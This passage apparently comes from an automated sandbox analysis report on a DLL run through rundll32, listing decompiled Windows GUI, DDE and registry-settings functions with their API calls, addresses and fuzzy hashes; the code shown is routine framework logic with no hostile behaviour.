                                                                                                            0x10030b70
                                                                                                            0x00000000
                                                                                                            0x10030b70

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Capture$Message$Dispatch
                                                                                                            • String ID:
                                                                                                            • API String ID: 3654672037-0
                                                                                                            • Opcode ID: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                                                            • Instruction ID: d9b79505f63fc07e8b5b8f3565facbd5cf555a7e12dc77f8d6b56f2636bb58fe
                                                                                                            • Opcode Fuzzy Hash: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                                                            • Instruction Fuzzy Hash: 8431B434A02609AFCB63DBB58C65D6FF6E8EF80787F104419B445DA163CB30A980D762
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002A1CA Relevance: 9.1, APIs: 6, Instructions: 69windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002A1CA(void* __ecx) {
				struct HACCEL__* _t25;
				void* _t44;
				void* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t48;

				_t44 = __ecx;
				_t40 = __ecx + 0x60;
				_t25 =  *(__ecx + 0x60);
				_t45 = 0;
				if( *((intOrPtr*)(_t25 - 0xc)) == 0) {
					_t25 = E10006A60(_t40,  *((intOrPtr*)(__ecx + 0x3c)));
				}
				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {
					_t48 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					 *(_t44 + 0x30) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {
					_t47 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					 *(_t44 + 0x38) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {
					_t46 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					 *(_t44 + 0x28) = _t25;
				}
				return _t25;
			}









                                                                                                            0x1002a1cd
                                                                                                            0x1002a1cf
                                                                                                            0x1002a1d2
                                                                                                            0x1002a1d4
                                                                                                            0x1002a1da
                                                                                                            0x1002a1df
                                                                                                            0x1002a1df
                                                                                                            0x1002a1f3
                                                                                                            0x1002a1ff
                                                                                                            0x1002a20a
                                                                                                            0x1002a213
                                                                                                            0x1002a215
                                                                                                            0x1002a218
                                                                                                            0x1002a218
                                                                                                            0x1002a21d
                                                                                                            0x1002a229
                                                                                                            0x1002a234
                                                                                                            0x1002a23d
                                                                                                            0x1002a23f
                                                                                                            0x1002a242
                                                                                                            0x1002a242
                                                                                                            0x1002a247
                                                                                                            0x1002a253
                                                                                                            0x1002a25e
                                                                                                            0x1002a267
                                                                                                            0x1002a269
                                                                                                            0x1002a269
                                                                                                            0x1002a270

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$AcceleratorsMenu
                                                                                                            • String ID:
                                                                                                            • API String ID: 144087665-0
                                                                                                            • Opcode ID: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                                                            • Instruction ID: 79ec512449ce6a4c7bf2710ae8ff5bed15bebc86ac40dbf708adfd4365bfde7a
                                                                                                            • Opcode Fuzzy Hash: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                                                            • Instruction Fuzzy Hash: 8821EA75401B18DFC3B0EF6A9940937F3F8FF09651751446FEA8A86912DA36F890DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002B105 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B105(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1002B0CC();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x1c);
					goto L7;
				}
				_t13 = E10006C53();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                                                            0x1002b10d
                                                                                                            0x1002b115
                                                                                                            0x1002b117
                                                                                                            0x1002b134
                                                                                                            0x1002b142
                                                                                                            0x1002b14d
                                                                                                            0x1002b14f
                                                                                                            0x1002b151
                                                                                                            0x1002b153
                                                                                                            0x1002b15e
                                                                                                            0x1002b160
                                                                                                            0x1002b16d
                                                                                                            0x1002b16d
                                                                                                            0x1002b16f
                                                                                                            0x1002b175
                                                                                                            0x1002b179
                                                                                                            0x1002b197
                                                                                                            0x1002b18a
                                                                                                            0x1002b18d
                                                                                                            0x1002b18f
                                                                                                            0x1002b18f
                                                                                                            0x1002b179
                                                                                                            0x1002b1a0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002b155
                                                                                                            0x1002b155
                                                                                                            0x1002b156
                                                                                                            0x1002b158
                                                                                                            0x1002b15a
                                                                                                            0x00000000
                                                                                                            0x1002b155
                                                                                                            0x1002b147
                                                                                                            0x1002b149
                                                                                                            0x1002b14b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002b14b
                                                                                                            0x1002b119
                                                                                                            0x1002b120
                                                                                                            0x1002b12f
                                                                                                            0x1002b12f
                                                                                                            0x00000000
                                                                                                            0x1002b12f
                                                                                                            0x1002b122
                                                                                                            0x1002b129
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002b12b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                            • String ID:
                                                                                                            • API String ID: 670545878-0
                                                                                                            • Opcode ID: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                                                            • Instruction ID: ef498eb2053f32fc83163eb1be06eb9c016c70d7a0359ba6d8f1e9348af6cf1d
                                                                                                            • Opcode Fuzzy Hash: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
                                                                                                            • Instruction Fuzzy Hash: E111A332601F764FD362DA6AACA4B2B77DCDF41BD1FD20159EC04D7211DB60EC104290
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002B501 Relevance: 9.1, APIs: 6, Instructions: 57registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002B501(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x64));
				}
				if(_a8 != 0) {
					_t28 = E10035959(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E100358C8(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}





                                                                                                            0x1002b50a
                                                                                                            0x00000000
                                                                                                            0x1002b58b
                                                                                                            0x1002b510
                                                                                                            0x1002b539
                                                                                                            0x1002b53b
                                                                                                            0x1002b54f
                                                                                                            0x1002b51d
                                                                                                            0x00000000
                                                                                                            0x1002b51d
                                                                                                            0x1002b567
                                                                                                            0x1002b56d
                                                                                                            0x1002b570
                                                                                                            0x00000000
                                                                                                            0x1002b57a
                                                                                                            0x1002b53f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002b545
                                                                                                            0x00000000
                                                                                                            0x1002b545
                                                                                                            0x1002b517
                                                                                                            0x1002b51b
                                                                                                            0x1002b525
                                                                                                            0x00000000
                                                                                                            0x1002b525
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1002B525
                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 1002B545
                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10024C29,?), ref: 1002B570
                                                                                                              • Part of subcall function 100358C8: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                                                              • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                                                              • Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                                                              • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                                                              • Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B58B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 1886894508-0
                                                                                                            • Opcode ID: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                                                            • Instruction ID: c8f527a64b8234d0edd8db9930868310c0db2fd70ee1d53d59517915cf010f6f
                                                                                                            • Opcode Fuzzy Hash: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
                                                                                                            • Instruction Fuzzy Hash: D1114832401E79FFDB128F61DC48F9E3BA9EF043A1F814510FD049D061CB328A61AB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10031F4A Relevance: 9.1, APIs: 6, Instructions: 56stringwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 46%
                                                                                                            			E10031F4A(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v528;
				void* _v532;
				char _v536;
				intOrPtr _t15;
				long _t22;
				void* _t25;
				void* _t29;

				_t15 =  *0x1004c470; // 0x6edecb8c
				_v8 = _t15;
				_push( &_v532);
				_push( &_v536);
				_push(_a8);
				_push(0x3e8);
				_t29 = __ecx;
				L1001CA38();
				if(lstrlenA(GlobalLock(_v532)) < 0x208) {
					_t22 = GlobalUnlock(_v532);
					_push(_v532);
					_push(0x8000);
					_push(0x3e4);
					_push(0x3e8);
					_push(_a8);
					L1001CA32();
					PostMessageA(_a4, 0x3e4,  *(_t29 + 0x1c), _t22);
					if(E100203CE(_t29) != 0) {
						_t25 = E100373B5();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)))) + 0xa0))( &_v528);
					}
				}
				return E100117AE(0, _v8);
			}











                                                                                                            0x10031f53
                                                                                                            0x10031f5a
                                                                                                            0x10031f63
                                                                                                            0x10031f6a
                                                                                                            0x10031f6b
                                                                                                            0x10031f73
                                                                                                            0x10031f74
                                                                                                            0x10031f76
                                                                                                            0x10031f93
                                                                                                            0x10031f9c
                                                                                                            0x10031fa2
                                                                                                            0x10031fad
                                                                                                            0x10031fb2
                                                                                                            0x10031fb3
                                                                                                            0x10031fb4
                                                                                                            0x10031fb7
                                                                                                            0x10031fc4
                                                                                                            0x10031fd4
                                                                                                            0x10031fd6
                                                                                                            0x10031fe9
                                                                                                            0x10031fe9
                                                                                                            0x10031fd4
                                                                                                            0x10031ffc

                                                                                                            APIs
                                                                                                            • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 10031F76
                                                                                                            • GlobalLock.KERNEL32 ref: 10031F81
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10031F88
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 10031F9C
                                                                                                            • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10031FB7
                                                                                                            • PostMessageA.USER32 ref: 10031FC4
                                                                                                              • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 462239228-0
                                                                                                            • Opcode ID: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                                                            • Instruction ID: bfbb9d00b13f65a0ab326070f2ebd1bafe94df8b281a4b7973d805b3987b007f
                                                                                                            • Opcode Fuzzy Hash: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
                                                                                                            • Instruction Fuzzy Hash: 8D111C3554121CAFDB12DFA1DC88DDE7BB9FF55351F0045A5F809EA262DA34DE808B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10029BA4 Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10029BA4(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t6;
				struct HWND__* _t11;
				struct HWND__* _t14;

				_t3 = GetFocus();
				_t14 = _t3;
				if(_t14 != 0) {
					_t11 = _a4;
					if(_t14 == _t11) {
						L10:
						return _t3;
					}
					if(E10029A8E(_t14, 3) != 0) {
						L5:
						if(_t11 == 0 || (GetWindowLongA(_t11, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t14, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t11);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t14);
					_t14 = _t3;
					if(_t14 == _t11) {
						goto L9;
					}
					_t3 = E10029A8E(_t14, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}







                                                                                                            0x10029ba5
                                                                                                            0x10029bab
                                                                                                            0x10029baf
                                                                                                            0x10029bb2
                                                                                                            0x10029bb8
                                                                                                            0x10029c16
                                                                                                            0x00000000
                                                                                                            0x10029c16
                                                                                                            0x10029bcb
                                                                                                            0x10029be2
                                                                                                            0x10029be4
                                                                                                            0x10029c05
                                                                                                            0x10029c0f
                                                                                                            0x00000000
                                                                                                            0x10029bf6
                                                                                                            0x10029bf7
                                                                                                            0x10029bfb
                                                                                                            0x10029c03
                                                                                                            0x10029c15
                                                                                                            0x00000000
                                                                                                            0x10029c15
                                                                                                            0x00000000
                                                                                                            0x10029c03
                                                                                                            0x10029be4
                                                                                                            0x10029bce
                                                                                                            0x10029bd0
                                                                                                            0x10029bd4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10029bd9
                                                                                                            0x10029be0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10029be0
                                                                                                            0x10029c18

                                                                                                            APIs
                                                                                                            • GetFocus.USER32(?,10032120,?), ref: 10029BA5
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            • GetParent.USER32(00000000), ref: 10029BCE
                                                                                                              • Part of subcall function 10029A8E: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                                                              • Part of subcall function 10029A8E: lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                                                            • GetWindowLongA.USER32 ref: 10029BE9
                                                                                                            • GetParent.USER32(10032120), ref: 10029BF7
                                                                                                            • GetDesktopWindow.USER32 ref: 10029BFB
                                                                                                            • SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 10029C0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 2818563221-0
                                                                                                            • Opcode ID: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                                                            • Instruction ID: cea5fa679d97d2953b6d76dc507eb4c5e7da3a0c11b163d723fb81d4da4a6e61
                                                                                                            • Opcode Fuzzy Hash: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                                                            • Instruction Fuzzy Hash: 7FF0A932500A306EE353A62B6D88F5E61D8DF81BD0FB20214F459E6192EB24AC8145A9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10037A96 Relevance: 9.0, APIs: 6, Instructions: 47registrystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E10037A96(void* _a4, char* _a8, char* _a12) {
				void* _t14;
				long _t18;
				signed int _t20;
				long _t25;

				if(_a12 != 0) {
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
						L6:
						_t14 = 0;
						L7:
						return _t14;
					}
					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
					_t18 = RegCloseKey(_a4);
					if(_t18 != 0 || _t25 != 0) {
						goto L6;
					} else {
						_t14 = _t18 + 1;
						goto L7;
					}
				}
				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
				asm("sbb eax, eax");
				return  ~_t20 + 1;
			}







                                                                                                            0x10037a9d
                                                                                                            0x10037ad8
                                                                                                            0x10037b0e
                                                                                                            0x10037b0e
                                                                                                            0x10037b10
                                                                                                            0x00000000
                                                                                                            0x10037b10
                                                                                                            0x10037afb
                                                                                                            0x10037afd
                                                                                                            0x10037b05
                                                                                                            0x00000000
                                                                                                            0x10037b0b
                                                                                                            0x10037b0b
                                                                                                            0x00000000
                                                                                                            0x10037b0b
                                                                                                            0x10037b05
                                                                                                            0x10037ab6
                                                                                                            0x10037abe
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10037AA2
                                                                                                            • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 10037AB6
                                                                                                            • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10037AD0
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10037ADD
                                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 10037AF2
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10037AFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Valuelstrlen$CloseCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 306239685-0
                                                                                                            • Opcode ID: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                                                            • Instruction ID: 36ac44db30e1571f4bd1a6b15574b4d5f9e82ccdf85d97020e0dea724d6fc6de
                                                                                                            • Opcode Fuzzy Hash: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                                                            • Instruction Fuzzy Hash: 4501043220016DFFEB235FA1DD48F9A7BA9FB08792F108410FE1AD9061D3718A60DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10029C98 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E10029C98(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}






                                                                                                            0x10029ca7
                                                                                                            0x10029cf8
                                                                                                            0x10029cf8
                                                                                                            0x10029cfa
                                                                                                            0x10029cfe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10029cc4
                                                                                                            0x10029cdb
                                                                                                            0x10029ce1
                                                                                                            0x10029cf3
                                                                                                            0x00000000
                                                                                                            0x10029d06
                                                                                                            0x10029cf3
                                                                                                            0x10029cf8
                                                                                                            0x10029cf8
                                                                                                            0x10029d03

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1315500227-0
                                                                                                            • Opcode ID: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                                                            • Instruction ID: 9b9f6f1c131c314e5c19284c1e668e0a3a9e33f7fca6b6c160f9dd0f3207debf
                                                                                                            • Opcode Fuzzy Hash: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
